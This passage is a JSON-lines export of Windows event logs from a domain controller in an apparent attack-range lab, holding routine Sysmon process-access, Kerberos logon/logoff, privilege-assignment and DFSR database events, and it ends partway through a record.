{"EventTime":"2020-08-01 05:51:55","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4269,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:51:55.372\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:51:55.372","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:51:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:51:55","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4270,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:51:55.372\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-00103F1E0500}\r\nSourceProcessId: 2768\r\nSourceThreadId: 2656\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-02FB-5F25-0000-001056390600}\r\nTargetProcessId: 2528\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:51:55.372","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-00103F1E0500}","SourceProcessId":"2768","SourceThreadId":"2656","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-02FB-5F25-0000-001056390600}","TargetProcessId":"2528","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:51:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:51:59","Hostname":"win-dc-881393.attackrange.local","Keywords":36028797018963968,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":102,"SourceName":"ESENT","Task":1,"RecordNumber":12125,"ProcessID":0,"ThreadID":0,"Channel":"Application","Message":"DFSRs (2804) \\\\.\\C:\\System Volume Information\\DFSR\\database_F254_F862_54F8_2ACD\\dfsr.db: The database engine (10.00.14393.0000) is starting a new instance (0).","Category":"General","Opcode":"Info","EventReceivedTime":"2020-08-01 05:51:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:51:59","Hostname":"win-dc-881393.attackrange.local","Keywords":36028797018963968,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":105,"SourceName":"ESENT","Task":1,"RecordNumber":12126,"ProcessID":0,"ThreadID":0,"Channel":"Application","Message":"DFSRs (2804) \\\\.\\C:\\System Volume Information\\DFSR\\database_F254_F862_54F8_2ACD\\dfsr.db: The database engine started a new instance (0). (Time=0 seconds) \r\n \r\nInternal Timing Sequence: [1] 0.000, [2] 0.000, [3] 0.000, [4] 0.031, [5] 0.000, [6] 0.000, [7] 0.031, [8] 0.000, [9] 0.000, [10] 0.000.","Category":"General","Opcode":"Info","EventReceivedTime":"2020-08-01 05:51:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:51:59","Hostname":"win-dc-881393.attackrange.local","Keywords":36028797018963968,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":326,"SourceName":"ESENT","Task":1,"RecordNumber":12127,"ProcessID":0,"ThreadID":0,"Channel":"Application","Message":"DFSRs (2804) \\\\.\\C:\\System Volume Information\\DFSR\\database_F254_F862_54F8_2ACD\\dfsr.db: The database engine attached a database (1, \\\\.\\C:\\System Volume Information\\DFSR\\database_F254_F862_54F8_2ACD\\dfsr.db). (Time=0 seconds) \r\n \r\nInternal Timing Sequence: [1] 0.000, [2] 0.000, [3] 0.000, [4] 0.000, [5] 0.000, [6] 0.000, [7] 0.000, [8] 0.000, [9] 0.000, [10] 0.000, [11] 0.000, [12] 0.000. \r\nSaved Cache: 0 0","Category":"General","Opcode":"Info","EventReceivedTime":"2020-08-01 05:51:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:51:58","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220423,"ProcessID":864,"ThreadID":1368,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-881393$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x63C16\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"WIN-DC-881393$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x63c16","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","EventReceivedTime":"2020-08-01 05:52:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:51:58","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220424,"ProcessID":864,"ThreadID":1368,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-0-0\r\n\tAccount Name:\t\t-\r\n\tAccount Domain:\t\t-\r\n\tLogon ID:\t\t0x0\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-881393$\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon ID:\t\t0x63C16\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{433511B1-83A7-FED9-9147-785D15F197B0}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x0\r\n\tProcess Name:\t\t-\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\t-\r\n\tSource Network Address:\t::1\r\n\tSource Port:\t\t54914\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tKerberos\r\n\tAuthentication Package:\tKerberos\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-0-0","SubjectUserName":"-","SubjectDomainName":"-","SubjectLogonId":"0x0","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-881393$","TargetDomainName":"ATTACKRANGE.LOCAL","TargetLogonId":"0x63c16","LogonType":"3","LogonProcessName":"Kerberos","AuthenticationPackageName":"Kerberos","WorkstationName":"-","LogonGuid":"{433511B1-83A7-FED9-9147-785D15F197B0}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"-","IpAddress":"::1","IpPort":"54914","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 05:52:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:51:58","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220425,"ProcessID":864,"ThreadID":4072,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-881393$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x63C16\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-881393$","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x63c16","LogonType":"3","EventReceivedTime":"2020-08-01 05:52:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:51:59","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220426,"ProcessID":864,"ThreadID":1368,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-881393$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x63C68\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"WIN-DC-881393$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x63c68","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","EventReceivedTime":"2020-08-01 05:52:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:51:59","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220427,"ProcessID":864,"ThreadID":1368,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-0-0\r\n\tAccount Name:\t\t-\r\n\tAccount Domain:\t\t-\r\n\tLogon ID:\t\t0x0\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-881393$\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon ID:\t\t0x63C68\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{433511B1-83A7-FED9-9147-785D15F197B0}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x0\r\n\tProcess Name:\t\t-\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\t-\r\n\tSource Network Address:\tfe80::3413:3332:6143:4f60\r\n\tSource Port:\t\t54915\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tKerberos\r\n\tAuthentication Package:\tKerberos\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-0-0","SubjectUserName":"-","SubjectDomainName":"-","SubjectLogonId":"0x0","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-881393$","TargetDomainName":"ATTACKRANGE.LOCAL","TargetLogonId":"0x63c68","LogonType":"3","LogonProcessName":"Kerberos","AuthenticationPackageName":"Kerberos","WorkstationName":"-","LogonGuid":"{433511B1-83A7-FED9-9147-785D15F197B0}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"-","IpAddress":"fe80::3413:3332:6143:4f60","IpPort":"54915","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 05:52:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:51:59","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220428,"ProcessID":864,"ThreadID":4072,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-881393$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x63CBA\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"WIN-DC-881393$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x63cba","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","EventReceivedTime":"2020-08-01 05:52:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:51:59","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220429,"ProcessID":864,"ThreadID":4072,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-0-0\r\n\tAccount Name:\t\t-\r\n\tAccount Domain:\t\t-\r\n\tLogon ID:\t\t0x0\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-881393$\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon ID:\t\t0x63CBA\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{433511B1-83A7-FED9-9147-785D15F197B0}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x0\r\n\tProcess Name:\t\t-\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\t-\r\n\tSource Network Address:\tfe80::3413:3332:6143:4f60\r\n\tSource Port:\t\t54917\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tKerberos\r\n\tAuthentication Package:\tKerberos\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-0-0","SubjectUserName":"-","SubjectDomainName":"-","SubjectLogonId":"0x0","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-881393$","TargetDomainName":"ATTACKRANGE.LOCAL","TargetLogonId":"0x63cba","LogonType":"3","LogonProcessName":"Kerberos","AuthenticationPackageName":"Kerberos","WorkstationName":"-","LogonGuid":"{433511B1-83A7-FED9-9147-785D15F197B0}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"-","IpAddress":"fe80::3413:3332:6143:4f60","IpPort":"54917","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 05:52:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:51:59","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220430,"ProcessID":864,"ThreadID":4072,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-881393$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x63CF5\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"WIN-DC-881393$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x63cf5","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","EventReceivedTime":"2020-08-01 05:52:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:51:59","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220431,"ProcessID":864,"ThreadID":4072,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-0-0\r\n\tAccount Name:\t\t-\r\n\tAccount Domain:\t\t-\r\n\tLogon ID:\t\t0x0\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-881393$\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon ID:\t\t0x63CF5\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{433511B1-83A7-FED9-9147-785D15F197B0}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x0\r\n\tProcess Name:\t\t-\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\t-\r\n\tSource Network Address:\tfe80::3413:3332:6143:4f60\r\n\tSource Port:\t\t54917\r\n\r\nDetailed Authentication Information:\r\n\tLogon 